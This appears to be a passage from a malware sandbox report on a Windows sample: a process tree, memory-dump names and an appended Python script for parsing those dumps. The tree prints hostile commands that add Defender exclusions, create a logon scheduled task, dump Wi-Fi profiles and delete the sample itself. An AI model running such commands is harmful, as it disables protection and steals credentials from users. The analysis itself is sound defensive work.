Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
- Suspicious use of WriteProcessMemory
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 3): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
Process (level 3): C:\windows\system32\trayfontdefender.exe
Command line: "C:\windows\system32\trayfontdefender.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\windows\system32\cmd.exe
Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
Process (level 5): \??\c:\windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
- Creates scheduled task(s)
Process (level 4): C:\windows\system32\microsoft\telemetry\sihost32.exe
Command line: "C:\windows\system32\microsoft\telemetry\sihost32.exe"
- Executes dropped EXE
Process (level 2): C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1760 -s 17003⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
-
C:\Windows\system32\findstr.exefindstr All4⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"3⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\skgrznb1.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8170.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8141.tmp"4⤵
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\lsddsds\lsdds.exe"C:\Windows\lsddsds\lsdds.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2544 /protectFile4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2544 "/protectFile"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'1⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {92DAC03C-4ABA-456B-9156-3512B67ACD14} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
-
C:\Windows\lsddsds\lsdds.exeC:\Windows\lsddsds\lsdds.exe2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
8KB
-
memory/2632-407-0x000000001AB20000-0x000000001AB22000-memory.dmpFilesize
8KB
-
memory/2692-187-0x0000000000000000-mapping.dmp
-
memory/2732-195-0x000000013FA00000-0x000000013FA01000-memory.dmpFilesize
4KB
-
memory/2732-309-0x000000001B5E0000-0x000000001B5E2000-memory.dmpFilesize
8KB
-
memory/2732-191-0x0000000000000000-mapping.dmp
-
memory/2776-242-0x0000000000000000-mapping.dmp
-
memory/2776-318-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/2776-317-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/2796-390-0x0000000002580000-0x0000000002582000-memory.dmpFilesize
8KB
-
memory/2796-391-0x0000000002584000-0x0000000002586000-memory.dmpFilesize
8KB
-
memory/2800-197-0x0000000000000000-mapping.dmp
-
memory/2832-199-0x0000000000000000-mapping.dmp
-
memory/2860-250-0x0000000000000000-mapping.dmp
-
memory/2860-319-0x000000001B1F0000-0x000000001B1F2000-memory.dmpFilesize
8KB
-
memory/2864-342-0x0000000000000000-mapping.dmp
-
memory/2868-208-0x000000001ABE0000-0x000000001ABE2000-memory.dmpFilesize
8KB
-
memory/2868-211-0x000000001ABE4000-0x000000001ABE6000-memory.dmpFilesize
8KB
-
memory/2868-200-0x0000000000000000-mapping.dmp
-
memory/2880-201-0x0000000000000000-mapping.dmp
-
memory/2892-320-0x000000001B950000-0x000000001B952000-memory.dmpFilesize
8KB
-
memory/2892-252-0x0000000000000000-mapping.dmp
-
memory/2904-253-0x0000000000000000-mapping.dmp
-
memory/2924-206-0x0000000000000000-mapping.dmp
-
memory/2948-400-0x000000001AB00000-0x000000001AB02000-memory.dmpFilesize
8KB
-
memory/2948-401-0x000000001AB04000-0x000000001AB06000-memory.dmpFilesize
8KB
-
memory/2952-209-0x0000000000000000-mapping.dmp
-
memory/3008-328-0x000000001AA54000-0x000000001AA56000-memory.dmpFilesize
8KB
-
memory/3008-327-0x000000001AA50000-0x000000001AA52000-memory.dmpFilesize
8KB
-
memory/3008-275-0x0000000000000000-mapping.dmp
-
memory/3024-218-0x0000000000000000-mapping.dmp
-
memory/3024-310-0x0000000002520000-0x0000000002522000-memory.dmpFilesize
8KB
-
memory/3024-222-0x000000013F310000-0x000000013F311000-memory.dmpFilesize
4KB
-
memory/3032-362-0x000000001B0C0000-0x000000001B0C2000-memory.dmpFilesize
8KB
-
memory/3032-336-0x0000000000000000-mapping.dmp
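The dump names above encode the process id, a sequence number and either an address range (memory.dmp) or a single address (mapping.dmp), and every range entry carries a rounded size. The following parser is an added example, not part of the sandbox report or of the sandbox's own tooling: it decodes those names, groups them per process, checks that each listed size agrees with the address range, and flags large regions sitting at 0x140000000, the default image base the MSVC linker assigns to 64-bit executables, which is where the XMRig-matched region in process 2224 lives. The size-rendering rule (1024-based, one decimal only when needed) is an assumption that matches every row on this page; the sample rows are copied from the listing above and embedded so the script runs offline.

```python
"""Decode sandbox memory-dump names and cross-check their listed sizes (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: six rows copied from the listing above, written as
# "<dump name> [<listed size>]", one entry per line.
SAMPLE_ROWS = """\
memory/2224-356-0x0000000140000000-0x0000000140758000-memory.dmp 7.3MB
memory/2224-354-0x00000001402EB66C-mapping.dmp
memory/2224-364-0x00000000005E0000-0x0000000000600000-memory.dmp 128KB
memory/2544-321-0x000000001B0E8000-0x000000001B107000-memory.dmp 124KB
memory/2732-195-0x000000013FA00000-0x000000013FA01000-memory.dmp 4KB
memory/3032-336-0x0000000000000000-mapping.dmp
"""

REGION_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
MAPPING_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-mapping\.dmp$")

# Default image base the MSVC linker gives 64-bit EXEs. A multi-MB region starting
# exactly here inside a process whose own image lives elsewhere deserves a look.
DEFAULT_X64_IMAGE_BASE = 0x140000000


@dataclass
class Dump:
    pid: int
    seq: int
    kind: str                   # "region" (start-end dump) or "mapping" (single address)
    start: int
    end: Optional[int]          # None for mapping entries
    listed_size: Optional[str]  # size text exactly as printed in the report, if any

    @property
    def span(self) -> Optional[int]:
        """Byte length implied by the address range; None for mapping entries."""
        return None if self.end is None else self.end - self.start


def human_size(n: int) -> str:
    """Render bytes the way the report does (assumed: 1024-based units, one decimal
    only when the value is not integral): 4096 -> '4KB', 7700480 -> '7.3MB'."""
    for unit, scale in (("GB", 1024 ** 3), ("MB", 1024 ** 2), ("KB", 1024)):
        if n >= scale:
            value = n / scale
            return (str(int(value)) if value == int(value) else f"{value:.1f}") + unit
    return f"{n}B"


def parse_entry(line: str) -> Dump:
    """Parse one '<dump name> [<size>]' line; raise ValueError on anything else."""
    parts = line.split()
    name = parts[0]
    listed = parts[1] if len(parts) > 1 else None
    m = REGION_RE.match(name)
    if m:
        pid, seq, start, end = m.groups()
        return Dump(int(pid), int(seq), "region", int(start, 16), int(end, 16), listed)
    m = MAPPING_RE.match(name)
    if m:
        pid, seq, addr = m.groups()
        return Dump(int(pid), int(seq), "mapping", int(addr, 16), None, listed)
    raise ValueError(f"unrecognised dump name: {name!r}")


def parse_listing(text: str) -> List[Dump]:
    return [parse_entry(line) for line in text.splitlines() if line.strip()]


def size_consistent(d: Dump) -> Optional[bool]:
    """True/False if the listed size agrees with the range; None when there is nothing to compare."""
    if d.span is None or d.listed_size is None:
        return None
    return human_size(d.span) == d.listed_size


def by_pid(dumps: List[Dump]) -> Dict[int, List[Dump]]:
    groups: Dict[int, List[Dump]] = defaultdict(list)
    for d in dumps:
        groups[d.pid].append(d)
    return dict(groups)


def suspicious_image_regions(dumps: List[Dump], minimum: int = 1024 * 1024) -> List[Dump]:
    """Region dumps that start at the default x64 image base and are at least `minimum` bytes."""
    return [d for d in dumps
            if d.kind == "region" and d.start == DEFAULT_X64_IMAGE_BASE and d.span >= minimum]


if __name__ == "__main__":
    dumps = parse_listing(SAMPLE_ROWS)
    for pid, entries in sorted(by_pid(dumps).items()):
        for d in entries:
            status = {True: "ok", False: "MISMATCH", None: "-"}[size_consistent(d)]
            rng = f"0x{d.start:X}" if d.end is None else f"0x{d.start:X}-0x{d.end:X}"
            print(f"{pid:>5} #{d.seq:<4} {d.kind:<8} {rng:<24} listed={d.listed_size or '-':<7} {status}")
    for d in suspicious_image_regions(dumps):
        print(f"PID {d.pid}: {human_size(d.span)} region at the default x64 image base (dump #{d.seq})")
```

Run against the full listing (after converting each entry to the "name size" shape used in the sample), `size_consistent` gives a quick sanity check that nothing was lost in extraction, and `suspicious_image_regions` singles out the 7.3MB region in 2224 while ignoring the 4KB pages at 0x13FA00000 and 0x13F310000 in 2732 and 3024.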